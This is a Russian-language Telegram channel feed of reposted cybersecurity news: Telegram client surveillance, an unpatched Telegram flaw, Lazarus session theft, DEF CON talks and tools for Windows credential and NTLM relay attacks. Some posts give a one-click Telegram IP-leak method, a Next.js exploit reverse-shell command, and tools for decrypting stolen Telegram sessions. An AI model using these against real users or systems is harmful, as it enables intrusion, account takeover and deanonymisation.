Фильтр публикаций




Репост из: CYBER-SEC ™️


Репост из: Эксплойт
Популярный Телеграм-клиент Telega может сливать все ваши переписки — вышло расследование, которое вскрыло жуткие подробности хайпового клиента.

— Клиент Telega добавил свои сервера в качестве фильтра для трафика. Работает это так: вы отправляете мем другу, сначала картинка попадает на сервера Telega и только после этого на официальные сервера Телеграм;

— Благодаря этому владельцы Telega могут читать ваши сообщения во всех чатах, подменять контент на каналах и даже делать определённые действия от вашего лица;

— Бонусом в клиенте отключена защита Perfect Forward Secrecy: благодаря этому слежка может работать «задним числом», предоставляя доступ и к вашим старым перепискам. Секретные чаты вскрыть не удалось, поэтому разрабы их просто удалили;

— Также внутри нашли тестовые стенды двух панелей модерации: Zeus — позволяет РКН точечно скрывать от ваших глаз любой контент; а также Cerberus — ИИ-фильтр, который в реальном времени мониторит ваши переписки на предмет запрещённых слов.

Конкурент МАХ выглядит восхитительно.

@exploitex


Репост из: Cybred
Этим можно взломать любого

В Telegram нашли критическую уязвимость, которую оценили в 9.8 по CVSS. Детали пока не разглашают. Но, судя по почти максимальной оценке, это может быть 0-click RCE. Иными словами, баг, позволяющий получить доступ к чужому устройству, просто отправив что-то в клиенте.

Ее нашел Michael DePlante — ресерчер, который вот уже несколько лет охотится за багами в Apple, Adobe, Avast и других крупных компаниях. Только за 2024 год он нашёл 37 уязвимостей, а всего — 150+. Причём многие из них связаны с неправильным парсингом файлов, что повышает вероятность на RCE в Telegram.

Патча пока нет, а подробности станут известны не позднее 24.07.2026, когда уже можно будет раскрыть инфу.


Репост из: RedTeam brazzers
На этой неделе компанию одного моего знакомого через социальную инженерию атаковала хакерская группировка Lazarus. В ходе анализа вредоносных действий на макбуке сотрудника удалось выяснить, что основной целью для захвата были крипто-кошельки, Apple Notes, история и сохраненные пароли в браузере и Keychain, а также целью атаки был захват аккаунта Telegram.
Вредонос достаточно нагло зиповал всю директорию и отправлял на командный центр Library/Application Support/Telegram Desktop/tdata/. И тут я подумал: неужели так просто можно украсть сессию Telegram?
Если локальный пароль НЕ установлен (по умолчанию) и вы не видите значок замочка (как на скрине) около историй, то ключ выводится из пустой строки. Таким образом любой с доступом к файлам может расшифровать сессии и кэш за миллисекунды. Далее эту сессию можно использовать на другом устройстве и в списке сессий вы не заметите ничего подозрительного.
Есть несколько инструментов для извлечения сессий и кешированных данных:
opentele
tdesktop-decrypter
telegram-desktop-decrypt
Неужели все так плохо? На самом деле нет, в настройках телеграмма можно установить "код-пароль" и на нем будут зашифрованы все файлы. Но на самом деле всегда можно извлечь хеш telegram2john.py и поставить на брут. Но на самом деле и в этом случае не все хорошо, потому что мы помним, что Lazarus уже забрали сохраненные пароли из браузера и password reuse никто не отменял.

@RedTeambro


Репост из: Cybred
Выложили доклады с конференции DEF CON 33. Она прошла в Лас-Вегасе и оказалась одной из самых крупных DEF CON за всю историю — конференцию посетили около 26 000 человек, а на YouTube уже опубликовано более 350(!) видео.

Среди них много докладов на самые разные темы — от классического веба и hardware-хакинга (и куда же без AI) до совсем неожиданных направлений: гайда по отмыванию средств с помощью криптовалюты, современного подхода к кардингу и взлома физических замков в отелях.

Один из участников, даже не смотря на угрозы судом, рассказал, как ему удалось разреверсить современные морские двигатели, найти способ удаленно менять их мощность, и перехватывать управление.

Собрал пару интересных тем, чтобы ты мог оценить для себя:
1. Exploiting Security Side Channels in E2E Encrypted Msngrs
2. Mapping the Shadow War From Estonia to Ukraine
3. Infecting the Boot to Own the Kernel
4. New Red Team Networking Techniques for Initial Access and Evasion
5. Breakin 'Em All – Overcoming Pokemon Go's Anti Cheat Mechanism
6. BitUnlocker: Leverage Windows Recovery to Extract BitLocker Secrets
7. Turning Microsoft's Login Page into our Phishing Infrastructure
8. Tactical Flipper Zero You Have 1 Hour and No Other Equipment
9. How malicious packages on npm bypass existing security tools
10. TSPU: Russia's Firewall and Defending Against Digital Repression

Полный плейлист со всеми докладами тут.


Репост из: Cybred
https://github.com/bytewreck/DumpGuard

На последних версиях Windows, mimikatz становится бесполезным, когда ты пытаешься сдампить LSASS. Это происходит, так как в LSASS ничего ценного больше не остается, ведь все секреты хранятся в отдельном защищённом процессе lsaiso.exe — этот механизм защиты называется Credential Guard, и он включен по умолчанию, начиная с с 22H2 / Server 2025.

Эта утилита позволяет "обойти" его с помощью Remote Credential Guard, который обычно используется при RDP-сессиях, чтобы не передавать секреты на удалённый сервер, — и получить все NTLMv1 хэши, не смотря на включенную защиту.




Репост из: Ralf Hacker Channel
Новый сканер для обнаружения уязвимостей к NTLM релеям

https://github.com/depthsecurity/RelayKing-Depth/

* Сканирует по SMB, LDAP/S, MSSQL, HTTP/S, RPC, WinRM
* Находит WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + всякие PrinterBug, PetitPotam и т.п.
* Поддерживает аудит всего домена
* Составляет список таргетов для ntlmrelayx и других софтин.
* Сохраняет отчет в plaintext/JSON/CSV/Markdown


Есть статья в блоге: https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/

#soft #git #ad #pentest #relay




Репост из: CYBER-SEC ™️




Репост из: CYBER-SEC ™️




Репост из: Cybred
Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.

Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку t.me/proxy?server=&port=&secret=random
3. Ждем, пока по ней кликнут, и сразу же получаем IP

Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.


Репост из: BeholderIsHere Media HUB
Кстати, в продолжение темы стеганографии, я уже писал про очень интересный проект ChamelionLab в своем канале Forensictools который, наверно, один из немногих с нормальным интерфейсом и функционалом позволяет, не только искать скрытую стеганографию, но и прятать. Причем делает и то и другое - великолепно.


Репост из: Cybred
Рабочий эксплоит

Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.

Получить шелл в одну команду можно так
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).

Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.

Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)


Репост из: BeholderIsHere Media HUB
Просто образы дисков для обучения криминалистов в извлечение данных на разных платформах.


Репост из: Proxy Bar
Извлечение данных из WhatsApp
*
READ


Репост из: Ralf Hacker Channel
Персист на уровне системы через DLL Hijacking в экранном дикторе Windows. Срабатывает при входе и выходе из системы.

https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers

#pentest #redteam #persist

Показано 20 последних публикаций.

0

подписчиков
Статистика канала